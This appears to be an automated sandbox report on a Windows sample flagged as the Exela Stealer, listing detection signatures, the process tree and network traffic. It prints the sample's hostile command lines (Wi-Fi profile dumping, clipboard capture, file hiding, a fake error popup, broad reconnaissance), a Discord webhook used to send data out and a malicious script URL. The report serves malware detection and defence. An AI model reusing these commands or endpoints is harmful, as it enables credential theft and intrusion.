Edit tour

Windows Analysis Report
9afaXJv52z.exe

Overview

General Information

Sample name:	9afaXJv52z.exe renamed because original name is a hash value
Original sample name:	ca120c365ddd0e24311e36e1ec5d4af6db21b0f2ebd6f7dfd0d6a3a730621367.exe
Analysis ID:	1374178
MD5:	4d70f444794dedf45c2a6562d4eaed19
SHA1:	337a7a9be709b1a3f848256c9e4a421911c265be
SHA256:	ca120c365ddd0e24311e36e1ec5d4af6db21b0f2ebd6f7dfd0d6a3a730621367
Tags:	exe
Infos:

Detection

Exela Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Exela Stealer

DLL side loading technique detected

Drops PE files to the startup folder

Found many strings related to Crypto-Wallets (likely being stolen)

Gathers network related connection and port information

Modifies the windows firewall

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Steals Internet Explorer cookies

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

9afaXJv52z.exe (PID: 6720 cmdline: C:\Users\user\Desktop\9afaXJv52z.exe MD5: 4D70F444794DEDF45C2A6562D4EAED19)

9afaXJv52z.exe (PID: 5828 cmdline: C:\Users\user\Desktop\9afaXJv52z.exe MD5: 4D70F444794DEDF45C2A6562D4EAED19)

cmd.exe (PID: 6920 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7588 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7660 cmdline: wmic computersystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7460 cmdline: C:\Windows\system32\cmd.exe /c "gdb --version" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7688 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7872 cmdline: wmic path Win32_ComputerSystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8024 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7944 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8040 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 8144 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7156 cmdline: attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

Conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5060 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 1240 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 3180 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7668 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7720 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7712 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7732 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3964 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)

cmd.exe (PID: 7420 cmdline: C:\Windows\system32\cmd.exe /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7840 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)

cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 8084 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

WmiPrvSE.exe (PID: 644 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

HOSTNAME.EXE (PID: 2020 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)

WMIC.exe (PID: 3180 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

net.exe (PID: 3964 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 7736 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

query.exe (PID: 7552 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)

quser.exe (PID: 7864 cmdline: C:\Windows\system32\quser.exe MD5: 480868AEBA9C04CA04D641D5ED29937B)

net.exe (PID: 7828 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 7992 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

net.exe (PID: 1056 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 6836 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

net.exe (PID: 1180 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

cmd.exe (PID: 7912 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 8124 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

Conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 8148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ExelaStealer	Yara detected Exela Stealer	Joe Security
00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ExelaStealer	Yara detected Exela Stealer	Joe Security
00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ExelaStealer	Yara detected Exela Stealer	Joe Security
00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 9afaXJv52z.exe PID: 5828	JoeSecurity_ExelaStealer	Yara detected Exela Stealer	Joe Security
Process Memory Space: 9afaXJv52z.exe PID: 5828	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\9afaXJv52z.exe, ParentImage: C:\Users\user\Desktop\9afaXJv52z.exe, ParentProcessId: 5828, ParentProcessName: 9afaXJv52z.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 7912, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 9afaXJv52z.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://raw.githubusercontent.com/justforExela/injection/main/injection.js

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe	Avira: detection malicious, Label: TR/Kryptik.tobsf
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe	Avira: detection malicious, Label: TR/Kryptik.tobsf

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe	ReversingLabs: Detection: 52%
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe	Virustotal: Detection: 65%	Perma Link
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe	Virustotal: Detection: 65%	Perma Link

Multi AV Scanner detection for submitted file

Source: 9afaXJv52z.exe	ReversingLabs: Detection: 52%
Source: 9afaXJv52z.exe	Virustotal: Detection: 65%			Perma Link

Source: 9afaXJv52z.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1564172723.0000020DAB880000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 9afaXJv52z.exe, 00000000.00000003.1243849896.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6850C7E4C
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850B88D0 FindFirstFileExW,FindClose,	0_2_00007FF6850B88D0
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6850D1EE4
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6850C7E4C

Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioAccept: /Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.1
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: /Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.1

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1190831584878809150/43baozn0FAVEYDo8eF-XivB5Q0JQGjw6pMMgTYce34wCzvDF3gAtdM_zDzFY9WMg2T-- HTTP/1.1Host: discord.comContent-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.1Content-Length: 1481

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 13 Jan 2024 05:50:27 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=a7326af6b1d711ee8a71f6ae5b42f42d; Expires=Thu, 11-Jan-2029 05:50:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1705125029x-ratelimit-reset-after: 1via: 1.1 googleAlt-Svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jLx5duCHgW2RQLiJj4bw%2BlbL9cagFn%2F4d4Z30bL20RQRryiSZmuboeShqYkIoOWZMIG8AWSO%2BbuvtgojH8LgU8JFU48%2BSoQA45gvY5ZZW58xoLCoEazCbC1i4TEK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=a7326af6b1d711ee8a71f6ae5b42f42d54e26f373fdf86319292142ab3e5999144397f4f80adacce011ffd6c0fb5ab76; Expires=Thu, 11-Jan-2029 05:50:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=a74299eec30796612ee1aba559cec2ac39e412a1-1705125027; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 13 Jan 2024 05:50:28 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=a77e5eb6b1d711eeb084def28c803d5e; Expires=Thu, 11-Jan-2029 05:50:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1705125029x-ratelimit-reset-after: 1via: 1.1 googleAlt-Svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vSHjjOFB3RExvl2kPkMVZ4w69meWRLvTViZStUOmBP6Zmky4L9s%2BBrAp%2B0frBc%2Bjjd5y4H266GvXOaMbgt9Zngs%2FabxLTXQ6juMDjTK7Tv%2BMaqVMNNrCI4PPdg1%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=a77e5eb6b1d711eeb084def28c803d5e56763b60dec7105d2cf6476e8a4f1f53993f110e60fee5b9918b2fc4551b2735; Expires=Thu, 11-Jan-2029 05:50:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 13 Jan 2024 05:50:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closestrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1705125030x-ratelimit-reset-after: 1via: 1.1 googleAlt-Svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H4X4LKwSel9ZQTXmcnvWKIUx2J03G%2BwsGdx0vPP3s6VVvxvewTz7yElHmr0TTqLfuyJXj%2BoBPSv%2F10J9O5MZPXuV6xEDyyAdJCxUw3RarviLt6lp1MdqpmSacwe6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 844b5ca3cb52399a-IAD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 13 Jan 2024 05:50:33 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=aa6eaf9ab1d711eeb2b12aa5ff753884; Expires=Thu, 11-Jan-2029 05:50:33 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1705125034x-ratelimit-reset-after: 1via: 1.1 googleAlt-Svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6V2Wco0lmtpiRIp9Uv%2F26zoevI66cBr5OJ9ZNhqDtS3tcU4Is9nDgcDOPO%2ByQqXnRMpQtoEmzVFWpEWNX7VMLijiGTo0qmjG2bEqaM3Ue7C%2FrBksIA6pZEm9prb5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=aa6eaf9ab1d711eeb2b12aa5ff7538849237bb3b5d6d2c90007dbe710cf160c2fca5a7dda41e6a273e5df00fc07f4769; Expires=Thu, 11-Jan-2029 05:50:33 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c9ed6a3e83268c7c3fb7dd8277627ee24c608a2f-1705125033; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None

Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 9afaXJv52z.exe, 00000000.00000003.1249086752.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250272952.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08F0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
